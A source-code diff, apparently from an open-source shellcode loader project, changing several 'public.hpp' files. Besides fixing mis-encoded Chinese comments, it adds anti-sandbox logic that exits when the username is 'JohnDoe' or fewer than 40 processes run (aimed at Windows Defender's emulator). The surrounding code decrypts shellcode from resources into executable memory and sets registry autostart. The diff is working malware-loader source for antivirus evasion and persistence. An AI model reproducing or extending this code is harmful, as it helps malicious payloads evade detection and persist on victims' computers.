knownsec · timwhitez · Dec 1, 2020 · Dec 1, 2020 · Dec 1, 2020 · Dec 1, 2020
diff --git a/plug/Dynamic Load plus/public.hpp b/plug/Dynamic Load plus/public.hpp
@@ -90,7 +90,7 @@ void AntiSimulation()
 	{
 		procnum++;
 	}
-	if (procnum <= 40)  //�жϵ�ǰ�����Ƿ����40����Ŀǰ������ģ�������̵���WD��ģ��39��
+	if (procnum <= 40)  //判断当前进程是否低于40个，目前见过能模拟最多进程的是WD能模拟39个
 	{
 		exit(1);
 	}
@@ -123,11 +123,11 @@ void AutoStart()
 **********************************************************************/
 void init(BOOL anti_sandbox, BOOL autostart)
 {
-	if (anti_sandbox)  //������
+	if (anti_sandbox)  //反仿真
 	{
 		AntiSimulation();
 	}
-	if (autostart)  //ע�������������
+	if (autostart)  //注册表添加自启动
 	{
 		AutoStart();
 	}
@@ -228,4 +228,4 @@ unsigned char* GetShellcodeFromRes(int resourceID, UINT &shellcodeSize)
 	memcpy(shellcode, (unsigned char*)pBuffer + sizeof(CONFIG), shellcodeSize);
 	StreamCrypt(shellcode, shellcodeSize, config.key, 128);
 	return shellcode;
-}
+}
diff --git a/plug/Dynamic Load/public.hpp b/plug/Dynamic Load/public.hpp
@@ -5,6 +5,9 @@ typedef HRSRC(WINAPI *pfnFindResourceW)(HMODULE hModule, LPCWSTR lpName, LPCWSTR
 typedef DWORD(WINAPI *pfnSizeofResource)(HMODULE hModule, HRSRC hResInfo);
 typedef HGLOBAL(WINAPI *pfnLoadResource)(HMODULE hModule, HRSRC hResInfo);
 typedef LPVOID(WINAPI *pfnLockResource)(HGLOBAL hResData);
+#define numSandboxUser 1
+const WCHAR* sandboxUsername[numSandboxUser] = { L"JohnDoe" };
+
 
 /**********************************************************************
 * @Function: GetShellcodeFromRes(int resourceID, UINT &shellcodeSize)
@@ -79,6 +82,9 @@ struct CONFIG
 **********************************************************************/
 void AntiSimulation()
 {
+	WCHAR username[3267];
+	DWORD charCount = 3267;
+
 	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 	if (INVALID_HANDLE_VALUE == hSnapshot)
 	{
@@ -90,10 +96,21 @@ void AntiSimulation()
 	{
 		procnum++;
 	}
-	if (procnum <= 40)  //�жϵ�ǰ�����Ƿ����40����Ŀǰ������ģ�������̵���WD��ģ��39��
+	if (procnum <= 40)  //判断当前进程是否低于40个，目前见过能模拟最多进程的是WD能模拟39个
 	{
 		exit(1);
 	}
+
+	if (!GetUserName(username, &charCount)) {
+		return;
+	}
+	for (int i = 0; i < numSandboxUser; ++i) {
+		if (wcsicmp(username, sandboxUsername[i]) == 0) {
+			exit(1);
+		}
+
+	}
+
 }
 
 /**********************************************************************
@@ -123,11 +140,11 @@ void AutoStart()
 **********************************************************************/
 void init(BOOL anti_sandbox, BOOL autostart)
 {
-	if (anti_sandbox)  //������
+	if (anti_sandbox)  //反仿真
 	{
 		AntiSimulation();
 	}
-	if (autostart)  //ע�������������
+	if (autostart)  //注册表添加自启动
 	{
 		AutoStart();
 	}
@@ -165,4 +182,4 @@ unsigned char* GetShellcodeFromRes(int resourceID, UINT &shellcodeSize)
 	memcpy(shellcode, (unsigned char*)pBuffer + sizeof(CONFIG), shellcodeSize);
 	StreamCrypt(shellcode, shellcodeSize, config.key, 128);
 	return shellcode;
-}
+}
diff --git a/plug/TLS Callback Load/public.hpp b/plug/TLS Callback Load/public.hpp
@@ -88,7 +88,7 @@ void AntiSimulation()
 	{
 		procnum++;
 	}
-	if (procnum <= 40)  //�жϵ�ǰ�����Ƿ����40����Ŀǰ������ģ�������̵���WD��ģ��39��
+	if (procnum <= 40)  //判断当前进程是否低于40个，目前见过能模拟最多进程的是WD能模拟39个
 	{
 		exit(1);
 	}
@@ -121,11 +121,11 @@ void AutoStart()
 **********************************************************************/
 void init(BOOL anti_sandbox, BOOL autostart)
 {
-	if (anti_sandbox)  //������
+	if (anti_sandbox)  //反仿真
 	{
 		AntiSimulation();
 	}
-	if (autostart)  //ע�������������
+	if (autostart)  //注册表添加自启动
 	{
 		AutoStart();
 	}
@@ -151,8 +151,8 @@ void GetShellcodeFromRes(int resourceID, UINT &shellcodeSize)
 	//2.Initialization
 	memcpy(&config, pBuffer, sizeof(CONFIG));
 	init(config.antisandbox, config.autostart);
-	//3.Getshellcode   //TLS�ص������в���ʹ��new�����ڴ棬�������ַ��ʴ�������ֱ�ӷ����ִ���ڴ�
+	//3.Getshellcode   //TLS回调函数中不能使用new分配内存，否则会出现访问错误，所以直接分配可执行内存
 	Memory = VirtualAlloc(NULL, totalSize - sizeof(CONFIG), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
 	memcpy(Memory, (char *)pBuffer + sizeof(CONFIG), totalSize - sizeof(CONFIG));
 	StreamCrypt((unsigned char*)Memory, totalSize - sizeof(CONFIG), config.key, 128);
-}
+}
diff --git a/plug/public.hpp b/plug/public.hpp
@@ -1,5 +1,7 @@
 #include<windows.h>
 #include<TlHelp32.h>
+#define numSandboxUser 1
+const WCHAR* sandboxUsername[numSandboxUser] = { L"JohnDoe" };
 
 /**********************************************************************
 * @Function: GetShellcodeFromRes(int resourceID, UINT &shellcodeSize)
@@ -75,6 +77,9 @@ struct CONFIG
 **********************************************************************/
 void AntiSimulation()
 {
+	WCHAR username[3267];
+	DWORD charCount = 3267;
+
 	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 	if (INVALID_HANDLE_VALUE == hSnapshot)
 	{
@@ -86,10 +91,21 @@ void AntiSimulation()
 	{
 		procnum++;
 	}
-	if (procnum <= 40)  //�жϵ�ǰ�����Ƿ����40����Ŀǰ������ģ�������̵���WD��ģ��39��
+	if (procnum <= 40)  //判断当前进程是否低于40个，目前见过能模拟最多进程的是WD能模拟39个
 	{
 		exit(1);
 	}
+
+	if (!GetUserName(username, &charCount)) {
+		return;
+	}
+	for (int i = 0; i < numSandboxUser; ++i) {
+		if (wcsicmp(username, sandboxUsername[i]) == 0) {
+			exit(1);
+		}
+
+	}
+
 }
 
 /**********************************************************************
@@ -119,11 +135,11 @@ void AutoStart()
 **********************************************************************/
 void init(BOOL anti_sandbox, BOOL autostart)
 {
-	if (anti_sandbox)  //������
+	if (anti_sandbox)  //反仿真
 	{
 		AntiSimulation();
 	}
-	if (autostart)  //ע�������������
+	if (autostart)  //注册表添加自启动
 	{
 		AutoStart();
 	}
@@ -154,4 +170,4 @@ unsigned char* GetShellcodeFromRes(int resourceID, UINT &shellcodeSize)
 	memcpy(shellcode, (unsigned char*)pBuffer + sizeof(CONFIG), shellcodeSize);
 	StreamCrypt(shellcode, shellcodeSize, config.key, 128);
 	return shellcode;
-}
+}